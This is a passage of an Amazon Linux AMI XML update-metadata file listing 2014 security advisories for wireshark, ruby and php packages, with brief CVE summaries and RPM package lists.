arch="i686"><filename>Packages/rsyslog-pgsql-5.8.10-9.26.amzn1.i686.rpm</filename></package><package name="rsyslog-gnutls" version="5.8.10" release="9.26.amzn1" epoch="0" arch="i686"><filename>Packages/rsyslog-gnutls-5.8.10-9.26.amzn1.i686.rpm</filename></package><package name="rsyslog-gssapi" version="5.8.10" release="9.26.amzn1" epoch="0" arch="i686"><filename>Packages/rsyslog-gssapi-5.8.10-9.26.amzn1.i686.rpm</filename></package><package name="rsyslog" version="5.8.10" release="9.26.amzn1" epoch="0" arch="i686"><filename>Packages/rsyslog-5.8.10-9.26.amzn1.i686.rpm</filename></package><package name="rsyslog-snmp" version="5.8.10" release="9.26.amzn1" epoch="0" arch="i686"><filename>Packages/rsyslog-snmp-5.8.10-9.26.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-446</id><title>Amazon Linux AMI 2014.03 - ALAS-2014-446: medium priority package update for wireshark</title><issued date="2014-11-11 10:27:00" /><updated date="2014-11-11 10:34:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-6432:
Multiple flaws were found in Wireshark. If Wireshark read a malformed packet off a network or opened a malicious dump file, it could crash or, possibly, execute arbitrary code as the user running Wireshark.
CVE-2014-6431:
Multiple flaws were found in Wireshark. If Wireshark read a malformed packet off a network or opened a malicious dump file, it could crash or, possibly, execute arbitrary code as the user running Wireshark.
CVE-2014-6430:
Multiple flaws were found in Wireshark. If Wireshark read a malformed packet off a network or opened a malicious dump file, it could crash or, possibly, execute arbitrary code as the user running Wireshark.
CVE-2014-6429:
Multiple flaws were found in Wireshark. If Wireshark read a malformed packet off a network or opened a malicious dump file, it could crash or, possibly, execute arbitrary code as the user running Wireshark.
CVE-2014-6428:
Several denial of service flaws were found in Wireshark. Wireshark could crash or stop responding if it read a malformed packet off a network, or opened a malicious dump file.
CVE-2014-6427:
Several denial of service flaws were found in Wireshark. Wireshark could crash or stop responding if it read a malformed packet off a network, or opened a malicious dump file.
CVE-2014-6426:
Several denial of service flaws were found in Wireshark. Wireshark could crash or stop responding if it read a malformed packet off a network, or opened a malicious dump file.
CVE-2014-6425:
Several denial of service flaws were found in Wireshark. Wireshark could crash or stop responding if it read a malformed packet off a network, or opened a malicious dump file.
CVE-2014-6424:
Several denial of service flaws were found in Wireshark. Wireshark could crash or stop responding if it read a malformed packet off a network, or opened a malicious dump file.
CVE-2014-6423:
Several denial of service flaws were found in Wireshark. Wireshark could crash or stop responding if it read a malformed packet off a network, or opened a malicious dump file.
CVE-2014-6422:
Several denial of service flaws were found in Wireshark. Wireshark could crash or stop responding if it read a malformed packet off a network, or opened a malicious dump file.
CVE-2014-6421:
Several denial of service flaws were found in Wireshark. Wireshark could crash or stop responding if it read a malformed packet off a network, or opened a malicious dump file.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6421" title="" id="CVE-2014-6421" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6422" title="" id="CVE-2014-6422" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6423" title="" id="CVE-2014-6423" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6424" title="" id="CVE-2014-6424" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6425" title="" id="CVE-2014-6425" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6426" title="" id="CVE-2014-6426" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6427" title="" id="CVE-2014-6427" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6428" title="" id="CVE-2014-6428" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6429" title="" id="CVE-2014-6429" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6430" title="" id="CVE-2014-6430" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6431" title="" id="CVE-2014-6431" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6432" title="" id="CVE-2014-6432" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2014:1676.html" title="" id="RHSA-2014:1676" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="wireshark-debuginfo" version="1.8.10" release="8.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/wireshark-debuginfo-1.8.10-8.14.amzn1.x86_64.rpm</filename></package><package name="wireshark" version="1.8.10" release="8.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/wireshark-1.8.10-8.14.amzn1.x86_64.rpm</filename></package><package name="wireshark-devel" version="1.8.10" release="8.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/wireshark-devel-1.8.10-8.14.amzn1.x86_64.rpm</filename></package><package name="wireshark-debuginfo" version="1.8.10" release="8.14.amzn1" epoch="0" arch="i686"><filename>Packages/wireshark-debuginfo-1.8.10-8.14.amzn1.i686.rpm</filename></package><package name="wireshark" version="1.8.10" release="8.14.amzn1" epoch="0" arch="i686"><filename>Packages/wireshark-1.8.10-8.14.amzn1.i686.rpm</filename></package><package name="wireshark-devel" version="1.8.10" release="8.14.amzn1" epoch="0" arch="i686"><filename>Packages/wireshark-devel-1.8.10-8.14.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-447</id><title>Amazon Linux AMI 2014.03 - ALAS-2014-447: medium priority package update for ruby19</title><issued date="2014-11-13 17:25:00" /><updated date="2014-11-16 13:32:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-8090:
1159927:
CVE-2014-8090 ruby: REXML incomplete fix for CVE-2014-8080
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8090" title="" id="CVE-2014-8090" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="rubygems19" version="1.8.23.2" release="32.64.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems19-1.8.23.2-32.64.amzn1.noarch.rpm</filename></package><package name="rubygem19-rdoc" version="3.9.5" release="32.64.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygem19-rdoc-3.9.5-32.64.amzn1.noarch.rpm</filename></package><package name="ruby19-debuginfo" version="1.9.3.551" release="32.64.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby19-debuginfo-1.9.3.551-32.64.amzn1.x86_64.rpm</filename></package><package name="rubygem19-minitest" version="2.5.1" release="32.64.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygem19-minitest-2.5.1-32.64.amzn1.noarch.rpm</filename></package><package name="rubygem19-json" version="1.5.5" release="32.64.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem19-json-1.5.5-32.64.amzn1.x86_64.rpm</filename></package><package name="rubygem19-io-console" version="0.3" release="32.64.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem19-io-console-0.3-32.64.amzn1.x86_64.rpm</filename></package><package name="ruby19-libs" version="1.9.3.551" release="32.64.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby19-libs-1.9.3.551-32.64.amzn1.x86_64.rpm</filename></package><package name="ruby19-doc" version="1.9.3.551" release="32.64.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby19-doc-1.9.3.551-32.64.amzn1.x86_64.rpm</filename></package><package name="rubygems19-devel" version="1.8.23.2" release="32.64.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems19-devel-1.8.23.2-32.64.amzn1.noarch.rpm</filename></package><package name="ruby19-devel" version="1.9.3.551" release="32.64.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby19-devel-1.9.3.551-32.64.amzn1.x86_64.rpm</filename></package><package name="rubygem19-rake" version="0.9.2.2" release="32.64.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygem19-rake-0.9.2.2-32.64.amzn1.noarch.rpm</filename></package><package name="ruby19-irb" version="1.9.3.551" release="32.64.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby19-irb-1.9.3.551-32.64.amzn1.noarch.rpm</filename></package><package name="rubygem19-bigdecimal" version="1.1.0" release="32.64.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem19-bigdecimal-1.1.0-32.64.amzn1.x86_64.rpm</filename></package><package name="ruby19" version="1.9.3.551" release="32.64.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby19-1.9.3.551-32.64.amzn1.x86_64.rpm</filename></package><package name="ruby19-debuginfo" version="1.9.3.551" release="32.64.amzn1" epoch="0" arch="i686"><filename>Packages/ruby19-debuginfo-1.9.3.551-32.64.amzn1.i686.rpm</filename></package><package name="rubygem19-json" version="1.5.5" release="32.64.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem19-json-1.5.5-32.64.amzn1.i686.rpm</filename></package><package name="rubygem19-bigdecimal" version="1.1.0" release="32.64.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem19-bigdecimal-1.1.0-32.64.amzn1.i686.rpm</filename></package><package name="ruby19-doc" version="1.9.3.551" release="32.64.amzn1" epoch="0" arch="i686"><filename>Packages/ruby19-doc-1.9.3.551-32.64.amzn1.i686.rpm</filename></package><package name="rubygem19-io-console" version="0.3" release="32.64.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem19-io-console-0.3-32.64.amzn1.i686.rpm</filename></package><package name="ruby19-libs" version="1.9.3.551" release="32.64.amzn1" epoch="0" arch="i686"><filename>Packages/ruby19-libs-1.9.3.551-32.64.amzn1.i686.rpm</filename></package><package name="ruby19" version="1.9.3.551" release="32.64.amzn1" epoch="0" arch="i686"><filename>Packages/ruby19-1.9.3.551-32.64.amzn1.i686.rpm</filename></package><package name="ruby19-devel" version="1.9.3.551" release="32.64.amzn1" epoch="0" arch="i686"><filename>Packages/ruby19-devel-1.9.3.551-32.64.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-448</id><title>Amazon Linux AMI 2014.03 - ALAS-2014-448: medium priority package update for ruby20</title><issued date="2014-11-13 17:26:00" /><updated date="2014-11-16 13:32:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-8090:
1159927:
CVE-2014-8090 ruby: REXML incomplete fix for CVE-2014-8080
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8090" title="" id="CVE-2014-8090" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="rubygem20-bigdecimal" version="1.2.0" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem20-bigdecimal-1.2.0-1.20.amzn1.x86_64.rpm</filename></package><package name="ruby20-libs" version="2.0.0.598" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby20-libs-2.0.0.598-1.20.amzn1.x86_64.rpm</filename></package><package name="rubygems20" version="2.0.14" release="1.20.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems20-2.0.14-1.20.amzn1.noarch.rpm</filename></package><package name="ruby20-doc" version="2.0.0.598" release="1.20.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby20-doc-2.0.0.598-1.20.amzn1.noarch.rpm</filename></package><package name="rubygem20-psych" version="2.0.0" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem20-psych-2.0.0-1.20.amzn1.x86_64.rpm</filename></package><package name="ruby20-devel" version="2.0.0.598" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby20-devel-2.0.0.598-1.20.amzn1.x86_64.rpm</filename></package><package name="ruby20" version="2.0.0.598" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby20-2.0.0.598-1.20.amzn1.x86_64.rpm</filename></package><package name="ruby20-irb" version="2.0.0.598" release="1.20.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby20-irb-2.0.0.598-1.20.amzn1.noarch.rpm</filename></package><package name="ruby20-debuginfo" version="2.0.0.598" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby20-debuginfo-2.0.0.598-1.20.amzn1.x86_64.rpm</filename></package><package name="rubygem20-io-console" version="0.4.2" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem20-io-console-0.4.2-1.20.amzn1.x86_64.rpm</filename></package><package name="rubygems20-devel" version="2.0.14" release="1.20.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems20-devel-2.0.14-1.20.amzn1.noarch.rpm</filename></package><package name="ruby20-libs" version="2.0.0.598" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/ruby20-libs-2.0.0.598-1.20.amzn1.i686.rpm</filename></package><package name="rubygem20-io-console" version="0.4.2" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem20-io-console-0.4.2-1.20.amzn1.i686.rpm</filename></package><package name="ruby20" version="2.0.0.598" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/ruby20-2.0.0.598-1.20.amzn1.i686.rpm</filename></package><package name="rubygem20-psych" version="2.0.0" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem20-psych-2.0.0-1.20.amzn1.i686.rpm</filename></package><package name="ruby20-devel" version="2.0.0.598" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/ruby20-devel-2.0.0.598-1.20.amzn1.i686.rpm</filename></package><package name="rubygem20-bigdecimal" version="1.2.0" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem20-bigdecimal-1.2.0-1.20.amzn1.i686.rpm</filename></package><package name="ruby20-debuginfo" version="2.0.0.598" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/ruby20-debuginfo-2.0.0.598-1.20.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-449</id><title>Amazon Linux AMI 2014.03 - ALAS-2014-449: medium priority package update for ruby21</title><issued date="2014-11-13 17:26:00" /><updated date="2014-11-16 13:33:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-8090:
1159927:
CVE-2014-8090 ruby: REXML incomplete fix for CVE-2014-8080
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8090" title="" id="CVE-2014-8090" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="ruby21-irb" version="2.1.5" release="1.15.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby21-irb-2.1.5-1.15.amzn1.noarch.rpm</filename></package><package name="rubygem21-bigdecimal" version="1.2.4" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem21-bigdecimal-1.2.4-1.15.amzn1.x86_64.rpm</filename></package><package name="rubygem21-psych" version="2.0.5" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem21-psych-2.0.5-1.15.amzn1.x86_64.rpm</filename></package><package name="rubygems21-devel" version="2.2.2" release="1.15.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems21-devel-2.2.2-1.15.amzn1.noarch.rpm</filename></package><package name="rubygem21-io-console" version="0.4.2" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem21-io-console-0.4.2-1.15.amzn1.x86_64.rpm</filename></package><package name="ruby21-debuginfo" version="2.1.5" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby21-debuginfo-2.1.5-1.15.amzn1.x86_64.rpm</filename></package><package name="ruby21" version="2.1.5" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby21-2.1.5-1.15.amzn1.x86_64.rpm</filename></package><package name="ruby21-doc" version="2.1.5" release="1.15.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby21-doc-2.1.5-1.15.amzn1.noarch.rpm</filename></package><package name="rubygems21" version="2.2.2" release="1.15.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems21-2.2.2-1.15.amzn1.noarch.rpm</filename></package><package name="ruby21-devel" version="2.1.5" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby21-devel-2.1.5-1.15.amzn1.x86_64.rpm</filename></package><package name="ruby21-libs" version="2.1.5" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby21-libs-2.1.5-1.15.amzn1.x86_64.rpm</filename></package><package name="rubygem21-psych" version="2.0.5" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem21-psych-2.0.5-1.15.amzn1.i686.rpm</filename></package><package name="ruby21" version="2.1.5" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/ruby21-2.1.5-1.15.amzn1.i686.rpm</filename></package><package name="ruby21-devel" version="2.1.5" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/ruby21-devel-2.1.5-1.15.amzn1.i686.rpm</filename></package><package name="rubygem21-bigdecimal" version="1.2.4" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem21-bigdecimal-1.2.4-1.15.amzn1.i686.rpm</filename></package><package name="rubygem21-io-console" version="0.4.2" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem21-io-console-0.4.2-1.15.amzn1.i686.rpm</filename></package><package name="ruby21-debuginfo" version="2.1.5" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/ruby21-debuginfo-2.1.5-1.15.amzn1.i686.rpm</filename></package><package name="ruby21-libs" version="2.1.5" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/ruby21-libs-2.1.5-1.15.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-450</id><title>Amazon Linux AMI 2014.03 - ALAS-2014-450: medium priority package update for php54</title><issued date="2014-11-22 13:58:00" /><updated date="2014-11-22 14:02:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-3710:
An out-of-bounds read flaw was found in the way the File Information (fileinfo) extension parsed Executable and Linkable Format (ELF) files. A remote attacker could use this flaw to crash a PHP application using fileinfo via a specially crafted ELF file.
1155071:
CVE-2014-3710 file: out-of-bounds read in elf note headers
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3710" title="" id="CVE-2014-3710" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php54-imap" version="5.4.35" release="1.63.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-imap-5.4.35-1.63.amzn1.x86_64.rpm</filename></package><package name="php54-soap" version="5.4.35" release="1.63.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-soap-5.4.35-1.63.amzn1.x86_64.rpm</filename></package><package name="php54-process" version="5.4.35" release="1.63.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-process-5.4.35-1.63.amzn1.x86_64.rpm</filename></package><package name="php54-mysqlnd" version="5.4.35" release="1.63.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mysqlnd-5.4.35-1.63.amzn1.x86_64.rpm</filename></package><package name="php54-pspell" version="5.4.35" release="1.63.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-pspell-5.4.35-1.63.amzn1.x86_64.rpm</filename></package><package name="php54-xml" version="5.4.35" release="1.63.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-xml-5.4.35-1.63.amzn1.x86_64.rpm</filename></package><package name="php54-odbc" version="5.4.35" release="1.63.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-odbc-5.4.35-1.63.amzn1.x86_64.rpm</filename></package><package name="php54-devel" version="5.4.35" release="1.63.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-devel-5.4.35-1.63.amzn1.x86_64.rpm</filename></package><package name="php54-debuginfo" version="5.4.35" release="1.63.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-debuginfo-5.4.35-1.63.amzn1.x86_64.rpm</filename></package><package name="php54-mcrypt" version="5.4.35" release="1.63.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mcrypt-5.4.35-1.63.amzn1.x86_64.rpm</filename></package><package name="php54-gd" version="5.4.35" release="1.63.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-gd-5.4.35-1.63.amzn1.x86_64.rpm</filename></package><package name="php54-dba" version="5.4.35" release="1.63.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-dba-5.4.35-1.63.amzn1.x86_64.rpm</filename></package><package name="php54-common" version="5.4.35" release="1.63.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-common-5.4.35-1.63.amzn1.x86_64.rpm</filename></package><package name="php54-intl" version="5.4.35" release="1.63.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-intl-5.4.35-1.63.amzn1.x86_64.rpm</filename></package><package name="php54-bcmath" version="5.4.35" release="1.63.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-bcmath-5.4.35-1.63.amzn1.x86_64.rpm</filename></package><package name="php54-enchant" version="5.4.35" release="1.63.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-enchant-5.4.35-1.63.amzn1.x86_64.rpm</filename></package><package name="php54-ldap" version="5.4.35" release="1.63.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-ldap-5.4.35-1.63.amzn1.x86_64.rpm</filename></package><package name="php54" version="5.4.35" release="1.63.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-5.4.35-1.63.amzn1.x86_64.rpm</filename></package><package name="php54-pdo" version="5.4.35" release="1.63.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-pdo-5.4.35-1.63.amzn1.x86_64.rpm</filename></package><package name="php54-cli" version="5.4.35" release="1.63.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-cli-5.4.35-1.63.amzn1.x86_64.rpm</filename></package><package name="php54-recode" version="5.4.35" release="1.63.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-recode-5.4.35-1.63.amzn1.x86_64.rpm</filename></package><package name="php54-xmlrpc" version="5.4.35" release="1.63.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-xmlrpc-5.4.35-1.63.amzn1.x86_64.rpm</filename></package><package name="php54-mysql" version="5.4.35" release="1.63.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mysql-5.4.35-1.63.amzn1.x86_64.rpm</filename></package><package name="php54-pgsql" version="5.4.35" release="1.63.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-pgsql-5.4.35-1.63.amzn1.x86_64.rpm</filename></package><package name="php54-mbstring" version="5.4.35" release="1.63.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mbstring-5.4.35-1.63.amzn1.x86_64.rpm</filename></package><package name="php54-fpm" version="5.4.35" release="1.63.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-fpm-5.4.35-1.63.amzn1.x86_64.rpm</filename></package><package name="php54-snmp" version="5.4.35" release="1.63.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-snmp-5.4.35-1.63.amzn1.x86_64.rpm</filename></package><package name="php54-mssql" version="5.4.35" release="1.63.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mssql-5.4.35-1.63.amzn1.x86_64.rpm</filename></package><package name="php54-embedded" version="5.4.35" release="1.63.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-embedded-5.4.35-1.63.amzn1.x86_64.rpm</filename></package><package name="php54-tidy" version="5.4.35" release="1.63.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-tidy-5.4.35-1.63.amzn1.x86_64.rpm</filename></package><package name="php54-recode" version="5.4.35" release="1.63.amzn1" epoch="0" arch="i686"><filename>Packages/php54-recode-5.4.35-1.63.amzn1.i686.rpm</filename></package><package name="php54-gd" version="5.4.35" release="1.63.amzn1" epoch="0" arch="i686"><filename>Packages/php54-gd-5.4.35-1.63.amzn1.i686.rpm</filename></package><package name="php54-pgsql" version="5.4.35" release="1.63.amzn1" epoch="0" arch="i686"><filename>Packages/php54-pgsql-5.4.35-1.63.amzn1.i686.rpm</filename></package><package name="php54-mysql" version="5.4.35" release="1.63.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mysql-5.4.35-1.63.amzn1.i686.rpm</filename></package><package name="php54-xml" version="5.4.35" release="1.63.amzn1" epoch="0" arch="i686"><filename>Packages/php54-xml-5.4.35-1.63.amzn1.i686.rpm</filename></package><package name="php54-enchant" version="5.4.35" release="1.63.amzn1" epoch="0" arch="i686"><filename>Packages/php54-enchant-5.4.35-1.63.amzn1.i686.rpm</filename></package><package name="php54-ldap" version="5.4.35" release="1.63.amzn1" epoch="0" arch="i686"><filename>Packages/php54-ldap-5.4.35-1.63.amzn1.i686.rpm</filename></package><package name="php54-process" version="5.4.35" release="1.63.amzn1" epoch="0" arch="i686"><filename>Packages/php54-process-5.4.35-1.63.amzn1.i686.rpm</filename></package><package name="php54-dba" version="5.4.35" release="1.63.amzn1" epoch="0" arch="i686"><filename>Packages/php54-dba-5.4.35-1.63.amzn1.i686.rpm</filename></package><package name="php54-devel" version="5.4.35" release="1.63.amzn1" epoch="0" arch="i686"><filename>Packages/php54-devel-5.4.35-1.63.amzn1.i686.rpm</filename></package><package name="php54-imap" version="5.4.35" release="1.63.amzn1" epoch="0" arch="i686"><filename>Packages/php54-imap-5.4.35-1.63.amzn1.i686.rpm</filename></package><package name="php54-mysqlnd" version="5.4.35" release="1.63.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mysqlnd-5.4.35-1.63.amzn1.i686.rpm</filename></package><package name="php54" version="5.4.35" release="1.63.amzn1" epoch="0" arch="i686"><filename>Packages/php54-5.4.35-1.63.amzn1.i686.rpm</filename></package><package name="php54-xmlrpc" version="5.4.35" release="1.63.amzn1" epoch="0" arch="i686"><filename>Packages/php54-xmlrpc-5.4.35-1.63.amzn1.i686.rpm</filename></package><package name="php54-debuginfo" version="5.4.35" release="1.63.amzn1" epoch="0" arch="i686"><filename>Packages/php54-debuginfo-5.4.35-1.63.amzn1.i686.rpm</filename></package><package name="php54-cli" version="5.4.35" release="1.63.amzn1" epoch="0" arch="i686"><filename>Packages/php54-cli-5.4.35-1.63.amzn1.i686.rpm</filename></package><package name="php54-pdo" version="5.4.35" release="1.63.amzn1" epoch="0" arch="i686"><filename>Packages/php54-pdo-5.4.35-1.63.amzn1.i686.rpm</filename></package><package name="php54-pspell" version="5.4.35" release="1.63.amzn1" epoch="0" arch="i686"><filename>Packages/php54-pspell-5.4.35-1.63.amzn1.i686.rpm</filename></package><package name="php54-mbstring" version="5.4.35" release="1.63.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mbstring-5.4.35-1.63.amzn1.i686.rpm</filename></package><package name="php54-fpm" version="5.4.35" release="1.63.amzn1" epoch="0" arch="i686"><filename>Packages/php54-fpm-5.4.35-1.63.amzn1.i686.rpm</filename></package><package name="php54-bcmath" version="5.4.35" release="1.63.amzn1" epoch="0" arch="i686"><filename>Packages/php54-bcmath-5.4.35-1.63.amzn1.i686.rpm</filename></package><package name="php54-mcrypt" version="5.4.35" release="1.63.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mcrypt-5.4.35-1.63.amzn1.i686.rpm</filename></package><package name="php54-common" version="5.4.35" release="1.63.amzn1" epoch="0" arch="i686"><filename>Packages/php54-common-5.4.35-1.63.amzn1.i686.rpm</filename></package><package name="php54-mssql" version="5.4.35" release="1.63.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mssql-5.4.35-1.63.amzn1.i686.rpm</filename></package><package name="php54-snmp" version="5.4.35" release="1.63.amzn1" epoch="0" arch="i686"><filename>Packages/php54-snmp-5.4.35-1.63.amzn1.i686.rpm</filename></package><package name="php54-intl" version="5.4.35" release="1.63.amzn1" epoch="0" arch="i686"><filename>Packages/php54-intl-5.4.35-1.63.amzn1.i686.rpm</filename></package><package name="php54-tidy" version="5.4.35" release="1.63.amzn1" epoch="0" arch="i686"><filename>Packages/php54-tidy-5.4.35-1.63.amzn1.i686.rpm</filename></package><package name="php54-embedded" version="5.4.35" release="1.63.amzn1" epoch="0" arch="i686"><filename>Packages/php54-embedded-5.4.35-1.63.amzn1.i686.rpm</filename></package><package name="php54-soap" version="5.4.35" release="1.63.amzn1" epoch="0" arch="i686"><filename>Packages/php54-soap-5.4.35-1.63.amzn1.i686.rpm</filename></package><package name="php54-odbc" version="5.4.35" release="1.63.amzn1" epoch="0" arch="i686"><filename>Packages/php54-odbc-5.4.35-1.63.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-451</id><title>Amazon Linux AMI 2014.03 - ALAS-2014-451: medium priority package update for php55</title><issued date="2014-11-22 13:58:00" /><updated date="2014-11-22 14:02:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-3710:
An out-of-bounds read flaw was found in the way the File Information (fileinfo) extension parsed Executable and Linkable Format (ELF) files. A remote attacker could use this flaw to crash a PHP application using fileinfo via a specially crafted ELF file.
1155071:
CVE-2014-3710 file: out-of-bounds read in elf note headers
